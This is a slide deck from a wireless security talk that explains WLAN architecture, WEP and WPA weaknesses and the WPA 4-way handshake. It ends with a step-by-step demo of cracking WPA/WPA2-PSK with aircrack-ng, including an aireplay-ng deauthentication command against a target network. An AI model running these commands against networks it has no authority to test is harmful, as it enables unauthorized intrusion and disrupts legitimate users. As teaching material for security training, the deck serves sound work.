1. Wireless Security
Nilesh Sapariya
CEH v8 , CCNA
Security Engineer
About me :

2. Agenda
1) Introduction to WLAN Security
2) WLAN Architectures
3) WPA / WPA2 PSK (Personal) Cracking

3. WLAN
1 ) In computing, Wireless LAN or Wireless Local Area
Network is a term to refer to a Local Area Network that
does not need cables to connect the different devices.
2) Instead, radio wave are used to communicate

4. From Fixed Device to Mobile Device

5. These Device’s don’t have LAN Port

6. Only and Best Mode of Connectivity

7. With Wi-Fi Ports Can Be Easily Cut In Half
Representative 12-person Workgroup
6 Conference room & public area ports
5 Other devices (printer, copier, fax, etc.)
12 Ports (reserved for future use)
V
C
O
Existing Wired Network Edge (1:1 ratio of ports to devices)
O O F F F F F F
“Right-sized” Edge (One port supports multiple users and devices simultaneously)
V V V V V V
V V V V V V
D D D D
O O
D D D O O
AP
O
Wireless is a more efficient, many-to-one access method
7
L
12 VOIP phones
7 Desktop PC’s
5 Laptop PCs
1 Wireless AP (mobile devices, guests, etc.)
D
F
AP
V V V V V V
V V V V V V
D D D D
D D D
AP
O O
F F F F F F
L L L L L
O C C C C C C

8. Wi-Fi Comes Problem
Challenging
Wi-Fi
Environment
Client Density
And
Diversity Challenges
Security against
Uncontrolled Wireless
Devices and Infrastructure
attacks
RF Noise Metal Objects with
Wheels
Building
Materials

9. Security Risk
Uncontrolled Wireless Devices
• Rogue APs
• Laptops acting as bridges
• Misconfigured WLAN Settings on laptops
• Ad-Hoc networks
Attacks against WLAN infrastructure
• Denial of Service/flooding
• Man-in-the-Middle
• WEP (Wired Equivalent Privacy ) cracking (aircrack-ng
– famous tool)
• WPA/WPA2 ( Wireless protected access ) cracking
(aircrack-ng – famous tool)

10. Security Risk
Ad Hoc
?
Access Point MAC
Spoofing
Server
Rogue User
Mis-configured Access
Point
Office
And More such kind of Attacks

11. Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac
• 1997 IEEE ( Institute of Electrical and
Electronics Engineering ) created First WLAN
• Called as 802.11
• 802.11 only supports max network BW = 2
Mbps (to slow for most of application )

12. WLAN Operation
• Wireless LAN (WLAN) Can operate in 2
different frequency ranges
• 2.4GHz (802.11 b/g/n )
• 4.9 or 5GHz (802.11 a/h/j/n)
• Note : your wireless card can only be on one
channel ( it has single radio )
• Every country has allowed channel ,users and
maximum power levels

13. • Fair distribution of clients
across channels
• eg. Channel 1, 6, 11
• Fair distribution of clients
across bands
• eg. 2.4-GHz and 5-GHz
Channel 1
Channel 6
Channel 11

14. WLAN Setup
“Fat” Access Point”
Management
Policy
Mobility
Forwarding
Encryption
Authentication
802.11a/b/g/n
Antennas
“Thin” Access Points
Management
Policy
Mobility
Forwarding
Encryption
Authentication
802.11a/b/g/n
Antennas
 Centralized Management
 Centralized Security
 Many devices to manage
 Many entry points to secure
Centralized
Mobility
Controller

15. Wardriving
• How to find SSID in your area
• How to find hidden SSID
• Tools used :-
i. inSSIDer
ii. Common view for wifi

16. Understanding WPA / WPA2
(Wi-Fi Protected Access )

17. Wireless Encryption
• The main source of vulnerability associated
with wireless networks are the methods of
encryption. There are a few different type
of wireless encryption including:
• WEP
• WPA
• WPA2

18. WEP
• Stands for Wired Equivalent Privacy.
• WEP is recognizable by the key of 10 or
26 hexadecimal digits.

19. WPA or WPA2
• Stands for Wi-Fi Protected Access
• Created to provide stronger security
• Still able to be cracked if a short password is
used.
• If a long passphrase or password is used,
these protocol are virtually not crackable.
• WPA-PSK and TKIP or AES use a Pre-Shared
Key (PSK) that is more than 7 and less than 64
characters in length.

20. Why WPA ?
WEP (Wired Equivalent Privacy )broken
beyond repair
if you are using 64 bit or 128 bit key WEP will be broken

21. Weaknesses of WEP
1. Poor key management
• WEP uses same key for authentication/encryption
• Provides no mechanism for session key
refreshing
• Static Key encryption used
2. One-way authentication

22. WEP Replacement
 WPA  WPA2
 Long Term Solution
 Use CCMP ( Counter Mode Cipher
Block Chaining Message
Authentication Code Protocol )
 Based on AES
 Hardware Change Require
 Intermediate solution by Wifi-
Alliance
 Use TKIP (Temporal Key Integrity
Protocol )
 Based on WEP
 Hardware change not required
 Firmware update
Personal Enterprise Personal Enterprise
PSK 802.1x + Radius PSK 802.1x + Radius

23. Difference between WPA-Personal
& WPA-Enterprise
 Wireless Architecture
 How to create profile for WPA-Personal
and WPA-Enterprise

24. WEP :Static Key Encryption
Static
WEP Key
Static
WEP Key
Probe Request-Response
Authentication RR , Association RR
Data Encrypted with Key

25. WPA :Non Static Key
Static
WEP Key
Static
WEP Key
Probe request response
Authentication , Association
Dynamic Key Generated First
Data Encrypted with Dynamic Key
How are dynamic keys Created ?

26. WPA / WPA2 PSK(Personal) Cracking

27. WPA Pre-shared Key
Pre-Shared Key 256 bit
PBKDF2
Passphrase (8-63 )
Pre-Shared Key 256 bit
PBKDF2
Passphrase (8-63 )

28. PBKDF2
• Password Based Key Derivation Function
• RFC 2898
• PBKDF2 (Passphrase, SSID,ssidLen,4096,256 )
• 4096 - Number of times the passphrase is
hashed
• 256 - Intended Key Length of PSK

29. How does the Client know ?
• Beacon Frames ?
• Probe Response Packets from the AP ?
• Can be used to create a WPA/WPA2 Honeypot
as well!

30. How WEP Works
1) We try to collect large number of data
packets
2) Bunch of large data packet contains weak IV
3) We Run it with the algorithm or aircrak-ng
and get the key
Then how to crack WPA-PSK ?

31. Lets “ Shake the hand” #4-way Handshake
Probe Request Response
Supplicant Authenticator
Authentication RR, Association RR
Pre-Shared Key 256 bit Pre-Shared Key 256 bit
ANounce
PTK
SNounce
Message 2
Snounce
PTK
Key Installed
+ MIC
Message 4
Key Install Acknowledgement
Key Installed

32. Pairwise Transient Key
• PTK = Function (PTK ,ANounce, SNounce,
Authenticator MAC ,Supplicant MAC )
 PMK= Pre-Shared Key (Pairwise master Key)
 ANounce = Random by AP
 SNounce = Random by Client
 Authentication MAC = AP MAC
 Supplicant MAC = Client MAC
 MIC – Message Integrity Check ( Signature
Algorithm )

33. WPA Working: Block Diagram
Pre-Shared Key 256 bit
PBKDF2
Passphrase (8-63 )
4 Way Handshake
SNonce
Anonce
AP MAC
Client MAC
PTK

34. WPA-PSK Susceptible to Dictionary
Attack

35. DEMO
WPA / WPA2 PSK(Personal) Cracking

36. External Wireless Card
• Alfa Networks AWUS036H
USB based card
• Already integrated with
Backtrack and Kali
• Allows for packet sniffing
• Allows for packet injection
• We will use this in our
Demo session

37. Software Setup
• Run Kali Linux on VM machine
• Connecting Alfa Adapter

38. Understanding Wireless Sniffing
• Wireless : Monitor mode
• When you put card in monitor mode then it will
accept all the packet it is seeing in the current
channel
• Inbuilt tool in Kali which helps in quickly put card
into monitoring mode and sniff the packets
• Will use Tool name : airmon-ng to put card in to
monitor mode ( part of aircrack sweet of tools )

39. Some Basic Terms
• MAC address or physical address is a unique
identifier assigned to network interfaces for
communications
• Access point >> Wireless router
• SSID (service set identifier) >> Network Name
• BSSID (basic service set identification ) >> MAC
address of the access point

40. Using KaliLinux or BT
• Some Basic Backtrack Terms >>
• Wlan0 – wireless interface
• Mon0 – monitor mode
• Handshake :-refers to the negotiation process
between the computer and a WiFi server using WPA
encryption.
Needed to crack WPA/WPA2.
• Dictionary - consisting the list of common
passowords.
• .cap file – used to store packets.

41. Tools Used
• Airmon-ng >> Placing different cards in monitor
mode
Airodump-ng (Packet snniffer ) >> Tool used to listen
to wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used
to inject frames.
– The primary function is to generate traffic for the
later use in aircrack-ng for cracking the WEP and
WPA-PSK keys.
• Aircrack-ng >> Cracks WEP and WPA (Dictionary
attack) keys.

42. Lets Hack 

43. Lets Start
This will list all of the wireless
cards that support monitor (not
injection) mode.
The “(monitor mode enabled)”
message means that the card has
successfully been put into monitor
mode. Note the name of the new
monitor interface, mine is mon0.

44. • Airodump will now list
all of the wireless
networks in your area.

45. • airodump-ng –c [channel] –
bssid [bssid] –w
/root/Desktop/ [monitor
interface]
Replace [channel] with the
channel of your target
network. Paste the network
BSSID where [bssid] is, and
replace [monitor interface]
with the name of your
monitor-enabled interface,
(mon0).

46. • Airodump with now monitor
only the target network,
allowing us to capture more
specific information about it.
NOTE :
• What we’re really doing now is
waiting for a device to connect
or reconnect to the network,
forcing the router to send out
the four-way handshake that
we need to capture in order to
crack the password.

47. aireplay-ng –0 2 –a [router bssid] –c [client bssid] mon0

48. Upon hitting Enter, you’ll see aireplay-ng send the packets, and within
moments, you should see this message appear on the airodump-ng screen!

49. Final Step
• aircrack-ng -a2 -b [router bssid] -w [path to wordlist]
/root/Desktop/*.cap
• -a is the method aircrack will use to crack the
handshake, 2=WPA method.
-b stands for bssid, replace [router bssid] with the
BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist, replace [path to wordlist] with
the path to a wordlist that you have downloaded. I
have a wordlist called “wpa.txt” in the root folder.
/root/Desktop/*.cap is the path to the .cap file
containing the password

50. If the phrase is in the wordlist, then aircrack-ng will
show it too you like this

51. Thank you
Email: nilesh.s.sapariya@gmail.com
Twitter : @nilesh_loganx
Contact : 8898813662